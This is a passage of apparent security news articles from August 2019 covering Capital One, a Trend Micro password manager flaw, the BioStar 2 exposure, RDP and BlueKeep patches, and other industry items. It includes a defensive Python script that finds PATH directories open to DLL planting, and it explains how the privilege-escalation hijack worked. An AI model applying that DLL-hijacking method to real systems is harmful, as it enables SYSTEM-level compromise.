Although Thompson most recently held a position as software engineer with Amazon Web Services, the cloud provider reportedly said that the breach of its client Capital One was not the result of any insider knowledge. It is said to have been made possible by a misconfigured web application run by the bank on AWS infrastructure.
A detention hearing at a federal court in Seattle is set for August 22.
Anti-malware company Trend Micro has patched a flaw in its password manager that could have enabled an attacker to run their own code on a user's computer with the highest possible access privileges.
Available for the iOS, Android, Windows and Mac platforms, Trend Micro Password Manager stores login credentials, features one-click login and form-filling capabilities and synchronizes with the cloud so that people can use it across different devices. It is available as a free service for up to five passwords. Users pay to store more credentials. They can buy the product on its own or as an optional part of Trend Micro's Premium Security and Maximum Security solutions.
SafeBreach found an issue with pwmSvc.exe, a central control service that runs with privileged user account status. If compromised, this could enable an attacker to escalate privileges to the system level. Because this software is signed by Trend Micro, compromising it would allow an attacker to bypass its application white list. It could also be used as a persistent attack mechanism because it automatically starts when the computer boots, SafeBreach said in its analysis.
The researchers noticed that the program tried to load a missing DLL file from the default Python directory, which can be included in the PATH environment variable (PATH is a variable that tells the computer in which directories to find executable programs).
The program relied on the PATH variable when loading the DLL instead of specifying an absolute path. It also didn't check for a digital certificate when loading DLL files.
SafeBreach researchers were able to compromise the system by adding the Python directory to the PATH variable and then using it to store an unsigned DLL file. This enabled them to piggyback their own code on Trend Micro's program, which would run it for them with elevated privileges.
An attacker could use this technique to compromise a system, they warned. "The service provides him with the ability to operate as NT AUTHORITY\SYSTEM which is the most powerful user in Windows, so he can access almost every file and process which belongs to the user on the computer," they wrote.
SafeBreach reported the flaw to Trend Micro on July 23, and the vendor patched it and released a new version on July 31. It also published a security bulletin of its own today addressing the issue.
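The two defects SafeBreach describes, a DLL loaded by bare name rather than absolute path and no signature check on what gets loaded, are only exploitable if the search order reaches a directory an unprivileged user controls. The block below is an added example, not SafeBreach's or Trend Micro's code, that audits the PATH leg of that search order: it lists PATH entries that are missing (an attacker can create them) or writable, and, for a DLL name a service is known to request, reports where a rogue copy could be planted if nothing satisfies the request. The sample PATH, directories and file set are constructed; the predicates are injectable so the functions run on any platform, and the `__main__` block runs them against the real environment.

```python
import ntpath
import os
from typing import Callable, Iterable, List, Optional, Tuple


def split_path(path_value: str, sep: str = ";") -> List[str]:
    """Split a Windows-style PATH value, dropping empties and surrounding quotes."""
    return [p.strip().strip('"') for p in path_value.split(sep) if p.strip()]


def hijackable_dirs(entries: Iterable[str],
                    exists: Callable[[str], bool] = os.path.isdir,
                    writable: Callable[[str], bool] = lambda d: os.access(d, os.W_OK)
                    ) -> List[Tuple[str, str]]:
    """PATH entries an unprivileged user could plant a DLL in.

    A missing directory is as bad as a writable one: whoever creates it owns it.
    """
    findings = []
    for d in entries:
        if not exists(d):
            findings.append((d, "does not exist (creatable by an attacker)"))
        elif writable(d):
            findings.append((d, "writable by the current user"))
    return findings


def resolve_dll(dll: str, search_dirs: Iterable[str],
                file_exists: Callable[[str], bool] = os.path.isfile) -> Optional[str]:
    """First directory in search order containing `dll`, or None if the name is unresolved."""
    for d in search_dirs:
        if file_exists(ntpath.join(d, dll)):
            return d
    return None


def audit_missing_dll(dll: str, path_value: str, exists, writable, file_exists) -> List[str]:
    """Directories from which an attacker could satisfy a request for `dll` that nothing else satisfies.

    Only the PATH leg of the Windows search order is covered; the application directory,
    system directories and current directory are searched before PATH and are assumed clean.
    """
    entries = split_path(path_value)
    if resolve_dll(dll, entries, file_exists) is not None:
        return []
    return [d for d, _ in hijackable_dirs(entries, exists, writable)]


# --- Constructed sample environment (hypothetical paths; not a real machine) ---
SAMPLE_PATH = r"C:\Windows\System32;C:\Windows;C:\Users\alice\AppData\Local\Programs\Python\Python37;C:\Tools"
EXISTING_DIRS = {r"C:\Windows\System32", r"C:\Windows",
                 r"C:\Users\alice\AppData\Local\Programs\Python\Python37"}
USER_WRITABLE = {r"C:\Users\alice\AppData\Local\Programs\Python\Python37"}   # per-user Python install
PRESENT_FILES = {r"C:\Windows\System32\kernel32.dll"}

if __name__ == "__main__":
    # Against the constructed sample: a privileged service asking for a DLL that is not there.
    print(audit_missing_dll("missing-helper.dll", SAMPLE_PATH,
                            EXISTING_DIRS.__contains__, USER_WRITABLE.__contains__,
                            PRESENT_FILES.__contains__))
    # Against the real machine (meaningful on Windows; elsewhere it just lists the local PATH).
    for d, why in hijackable_dirs(split_path(os.environ.get("PATH", ""), os.pathsep)):
        print(f"{d}: {why}")
```

The writable per-user Python directory is the exact condition SafeBreach exploited; the fix on the vendor side is to load with an absolute path and verify the signature, and on the administrator side to keep user-writable directories out of any PATH a SYSTEM service inherits.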
Cloud-based back-end services are letting mobile app developers down, according to research announced this week. Even when app developers are careful about their own code, the online services that they use introduce vulnerabilities on a regular basis.
The research, from the Georgia Institute of Technology and The Ohio State University, studied the top 5,000 apps on the Google Play Store. It found that between them, they were using 6,869 server networks across the world.
They scanned cloud-based back-ends and found 1,638 vulnerabilities, of which 655 were zero-days not listed in the National Vulnerability Database. These included SQL injection, cross-site scripting and XML external entity (XXE) attacks. Some of the apps affected had over 50 million installations, according to their paper.
Mobile apps access back-end services using third-party software-development kits (SDKs) and APIs. Developers use some of them explicitly, but many others are hidden in imported third-party libraries. The apps that use these services communicate with them invisibly. Users don't know what the services are doing or exactly which servers their phones are talking with when their apps fetch content and advertisements.
"Due to the inherent complexity of cloud-based backends, deploying and maintaining them securely is challenging. Consequently, mobile app developers often disregard prudent security practices when choosing cloud infrastructure, building, or renting these backends," the researchers said.
This opens up the apps to additional vulnerabilities that could compromise locally running code or leak user data, they added, citing the compromise of the British Airways website, which allowed attackers to steal data from the app.
The researchers scanned the apps with a tool called SkyWalker, which they will soon make available for app developers to audit the cloud-based tools that they are building into their apps.
They will present their findings at the USENIX Security Symposium in Santa Clara, California, which runs August 14–16, 2019.
A biometric building access system used by thousands of companies around the world has exposed 23 gigabytes of data, representing over 27.8 million records, researchers revealed today. The BioStar 2 product, used by such organizations as the UK Metropolitan Police, made information, including fingerprints and facial recognition images, publicly available.
Researchers from VPN advice company vpnMentor say they uncovered the data, exposed in the BioStar 2 web-based security platform. It stores biometric data used to access physical facilities at thousands of sites around the world. Customers use it to access secure areas of buildings and to log employees' movements for time and attendance purposes.
BioStar 2 is also integrated into third-party systems such as Nedap's AEOS access control system, which is used by over 5,700 organizations in 83 countries. The UK Metropolitan Police is among them.
Exposed data included not just unencrypted employee usernames and passwords but also over a million fingerprint records and facial recognition images. The researchers could see records of employee movements throughout physical facilities, along with their start dates and security clearance levels, their home address and emails.
vpnMentor discovered the exposed data mostly unencrypted in an Elasticsearch database. The team could access it via a browser and could manipulate the URL to extract the data, they said in a report published today.
Affected companies include home decor and DIY supplier Tile Mountain in the UK and Power World Gyms, a gym franchise in India and Sri Lanka, which stored over 113,000 user records and fingerprints in the database.
Suprema, the company that makes BioStar 2, was supremely uncooperative, according to vpnMentor, which tried several times to contact the company by email. "Eventually, we decided to reach out to BioStar 2’s offices by phone. Again, the company was largely unresponsive," said vpnMentor. "Upon speaking to a member of their German team, we received a mumbled reply that 'we don’t speak to vpnMentor', before the phone was suddenly hung up."
Suprema didn't respond to queries from Infosecurity Magazine either. However, the company eventually fixed the problem yesterday, eight days after vpnMentor first contacted it.
vpnMentor warned that cyber-criminals could use the information to mount phishing attacks or sell it on the dark web. They could also use it to gain physical access to thousands of facilities around the world.
"A hacked building’s entire security infrastructure becomes useless. Anybody with this data will have free movement to go anywhere they choose, undetected," they said.
BioStar 2 users should change their dashboard passwords immediately and notify employees to change their personal passwords, said the researchers. However, the exposure of a centralized biometric database highlights a deeper problem, warned Charity Wright, cyber-threat intelligence analyst and researcher at threat protection company IntSights Cyber Intelligence.
"Suprema is really lucky that security researchers discovered this and disclosed it ethically. If they determine that hackers have accessed these open servers, the damage will be catastrophic," she said. "Unlike credentials, biometrics can be stolen and used to hack people's 2FA. These are plain-text passwords and real fingerprints that can be used to mimic the victims' login information, and we are talking about over 1.5 million locations where this technology is used."
Microsoft has patched 93 unique CVEs this month, and although there are no zero-days or publicly disclosed flaws, there’s plenty to keep sysadmins busy, according to experts.
Top of the list are two wormable RDP flaws (CVE-2019-1181/1182) similar to the BlueKeep bug discovered earlier this year, which require urgent patching as an infection could spread without user interaction.
Elsewhere it’s a fairly light patch load by recent standards: there are 31 critical vulnerabilities and 65 rated as important.
“On the critical list are several Remote Code Execution (RCE) vulnerabilities including those that affect Hyper-V and Remote Desktop Services, services that are often exposed publicly. There are also RCE vulnerabilities in Outlook and Word where a maliciously crafted document or email could allow an attacker to execute their code,” explained Trustwave.
“Luckily the Outlook vulnerability can't be triggered by simply using the Preview pane. A similar RCE affects .LNK or 'shortcut' files, where an attacker could craft a malicious shortcut and would only need to get their target or victim to click on it to execute their code. There is also an RCE vulnerability in both DHCP servers and clients that could be triggered with a malicious DHCP lease request or response.”
“This tampering vulnerability has a CVSS score of 9.3. It requires specialised hardware to exploit but can allow wireless access and disruption within Bluetooth range of the device being attacked,” he explained. “Microsoft provided an update to address the issue, but the new functionality is disabled by default. You must enable the functionality by setting a flag in the registry.”
Elsewhere, Adobe released eight new updates including critical bulletins for Creative Cloud and Experience Manager and fixes for Acrobat and Acrobat Reader flaws, as well as a non-security update for Flash.
British Airways has come under fire from the security community again, this time after a vulnerability in its e-ticketing system was found to be exposing passengers' personally identifiable information (PII).
Security firm Wandera claimed in a blog post yesterday that the airline was sending out unencrypted check-in links to customers which contained booking reference and surname in the URL itself.
“Therefore, someone snooping on the same public Wi-Fi network can easily intercept the link request, which includes the booking reference and surname, and use these details to gain access to the passenger’s online itinerary in order to steal even more information or manipulate the booking information,” the firm explained.
With access to a customer’s account, hackers could then access further identity info including full name, itinerary, email address, phone number and much more – all valuable for use in potential follow-on phishing attacks and identity fraud.
Back in February, Wandera found the same vulnerability in check-in links sent by Southwest, KLM, Air France, Jetstar, Thomas Cook, Vueling, Air Europa and Transavia.
The firm recommended airlines use one-time tokens for direct links within emails and require explicit user authentication for all steps where PII is accessible and editable.
The news comes as BA is still reeling from a proposed £183m GDPR fine following security failings that allowed Magecart attackers to harvest customer details from its website.
Cesar Cerrudo, CTO at pen testers IOActive, argued that the focus for developers is too often on usability, performance and scalability rather than security.
“What is forgotten is just how sensitive the data being stored is,” he added.
“Yet while it is common practice for airlines to use third-party penetration testing for their hardware and critical flight services, they often test their online services and applications in-house using teams that are often under pressure from IT to meet strict time deadlines; meaning things slip through the gaps.”
Israel Barak, CISO at Cybereason, praised BA for acknowledging the incident and promising to fix it.
“This is hardly a knock-out punch for the airlines. For the consumer flying with British Airways, or with other carriers, they should be working under the assumption that their personal information has been compromised many times over,” he added.
“As an industry, until we can start making cybercrime unprofitable for adversaries, they will continue to hold the cards that will yield potentially massive pay-outs.”
The UK’s financial regulator has agreed to give the country’s payments and e-commerce providers more time to comply with new user authentication rules mandated by PSD2.
The Financial Conduct Authority (FCA) said yesterday that it would provide card issuers, payments firms and online retailers with an 18-month timeline to implement the Strong Customer Authentication (SCA) checks.
This is in line with the opinion of the European Banking Authority (EBA), which recently admitted that more time was needed to implement SCA given its complexity and a lack of preparedness in the market.
Originally set for a September 14 deadline, SCA will force any firms accepting payments online to ensure they apply two-factor authentication checks on their customers. In many cases, this will come in the form of the popular 3-D Secure option.
However, exceptions are made for low value payments (under €30), recurring payments such as subscriptions, customers who have whitelisted merchants they trust, and low-risk transactions. The latter requires a real-time risk assessment on each payment, and therefore advanced fraud screening tools.
The FCA will now not take action if any firms don’t meet the September 2019 deadline, as long as they can demonstrate “there is evidence that they have taken the necessary steps to comply with the plan.”
“The FCA has been working with the industry to put in place stronger means of ensuring that anyone seeking to make payments is not a fraudster,” explained Jonathan Davidson, executive director at the FCA.
“While these measures will reduce fraud, we want to make sure that they won’t cause material disruption to consumers themselves; so we have agreed a phased plan for their timely introduction.”
Jason Tooley, chief revenue officer at Veridium, said the delay was disappointing.
“Financial institutions and payment service providers have had nearly two years to prepare since the initial announcement, and there is no valid excuse for the delay in its enforcement apart from an unwillingness to participate,” he argued.
“Whilst it is true that consumers will see minor changes to their day-to-day spending, the additional layer of security on higher value payments will enable consumers to benefit from safer and more innovative electronic payment services. The impact on consumers must not be overlooked by the lengthy delay in enforcement; SCA will mean consumers are more confident when buying online – not act as a deterrent to sales as some have incorrectly suggested.”
Canada has launched a cybersecurity certification program to try and get small to midsize enterprises (SMEs) up to speed with a basic level of protection.
Launched at the University of New Brunswick's Canadian Institute for Cybersecurity by Minister of Finance Bill Morneau, CyberSecure Canada is a voluntary program that will help small organizations achieve a minimum required level of cybersecurity, according to the government.
The initiative requires Canadian SMEs to stick to a baseline set of cybersecurity controls developed by the Canadian Centre for Cyber Security. These controls include establishing an incident response plan, regularly patching operating systems and applications, using security software and securely configuring devices. Other measures in the list include using strong user authentication, offering employee awareness training and backing up and encrypting data.
Those passing the certification can display a mark showing that they have demonstrated compliance with the controls. Those businesses will also be listed on the program's website.
The Canadian government uses six certification bodies to check that companies have implemented the controls properly: Cyber Security Canada, Bell Canada, Bulletproof Solutions, Siemens, SourcetekIT, and WatSec. If businesses are using products and services from these companies that already meet the security controls, then some of the companies may certify them for free, the government's website says. Others may charge anywhere from a few hundred dollars to several thousand.
The certification lasts for two years, at which point businesses must go through the certification process again to continue using the certification mark.
The move follows growing concern over the cybersecurity preparedness of Canadian SMEs. In October, the Canadian Internet Registration Authority (CIRA) launched its 2018 Cybersecurity Security Survey, which gauged cybersecurity responses from 500 individuals at SMEs across Canada. It found that 40% of respondents had experienced a cyber-attack in the prior 12 months. Of the respondents, 88% were concerned with the prospect of future attacks, and 71% didn't have a formal software patching policy.
Google took another step toward ditching passwords as a login mechanism this week by announcing support for password-free access to some of its own services from Android phones. In a blog post on Monday, it demonstrated how users could access its cloud-based password manager using the new feature.
Users will be able to verify their identities by scanning their fingerprints on suitably equipped Android devices. While users have been able to access their phones using their fingerprints in the past, the new feature allows them to access back-end Google services as well.
The underlying technology uses standards underpinning FIDO2, which is a password-free log-in technology created by the FIDO Alliance. The underlying technologies, FIDO Client to Authenticator Protocol (CTAP) and W3C's WebAuthn, work together to authenticate the user on the phone and on the back-end site. The user creates a digital token by authenticating themselves on the phone, which CTAP then uses to authenticate with the browser. WebAuthn then sends a digital token to the back-end service, logging the user in.
To use the service, the phone must be running Android 7 (Nougat) or later and set up with a personal Google account. The device must also be running a valid screen lock.
Google's FIDO2 support also lets users log into services using a hardware key, such as its own Titan Bluetooth-enabled device.
This latest announcement marks another step in Google's support of FIDO2. In February, it adopted the standard for Android apps.
Google rolled out the feature on Pixel devices on Monday and said that other Android devices would get the feature in the coming days.
Other companies have also made strides toward password-free access. In May, Microsoft achieved FIDO2 certification for Windows Hello, its biometric-capable login system included in Windows 10. This enables users to log into their Microsoft accounts using a hardware security key. The company also allowed Firefox users to log into their Microsoft accounts using FIDO2, with support for Google's Chrome to follow.
Just as exploits for Microsoft's BlueKeep bug make it into the wild, the company has announced another set of vulnerabilities in Windows that is equally dangerous – and this time, it also affects Windows 10 systems.
Microsoft announced the bugs, along with an associated set of patches, as part of its monthly Patch Tuesday release. The vulnerabilities lie in Remote Desktop Services (RDS), the Windows service that enables users to use a computer from a different location. RDS uses the remote desktop protocol (RDP), and an attacker can get full access to a system by sending a malicious RDP request to the victim's computer.
These new vulnerabilities can compromise a computer without the user doing anything, which means that they can spread quickly and autonomously. Attackers can use them to create worms that spread like wildfire online.
This makes the new vulnerabilities very similar to BlueKeep, the existing RDP-based wormable flaw that Microsoft announced and patched on May 14, 2019. However, that vulnerability (CVE-2019-0708) didn't affect Windows 10. These flaws (CVE-2019-1181, 1182, 1222 and 1226) do.
"At this time, we have no evidence that these vulnerabilities were known to any third party," said Microsoft in a blog post announcing the move, but it also sent a clear message: Patch now.
The announcement comes just a day after the Australian Signals Directorate's Cyber Security Centre warned that someone had published a way to exploit BlueKeep. It said: "A security researcher under the Twitter handle @zerosum0x0 has recently disclosed his Remote Desktop Protocol (RDP) exploit for the BlueKeep vulnerability to Metasploit. The disclosure, once made available to the public, is anticipated to increase the amount of RDP scanning activity, increasing the chances of attempted exploitation of unpatched systems."
The researcher in question made that submission at least two weeks ago:
"RE: #BlueKeep @Metasploit. I performed a full knowledge transfer of my notes/code to the MSF core team. The release timeline is out of my hands and up to Rapid7 discretion. I've been too busy to work on it for over a month anyways; fresh eyes and polish. Thanks for understanding. pic.twitter.com/hXvpqbUYam" (@zerosum0x0, July 31, 2019)
Microsoft had also warned people repeatedly to patch those vulnerabilities, most recently on August 8, when it said that some 400,000 endpoints remained unprotected.
BlueKeep had been a difficult bug to exploit, although several security companies said that they had successfully produced proof of concept code internally. It isn't yet clear how difficult it will be to exploit the latest flaws or how quickly someone will produce and publish workable code.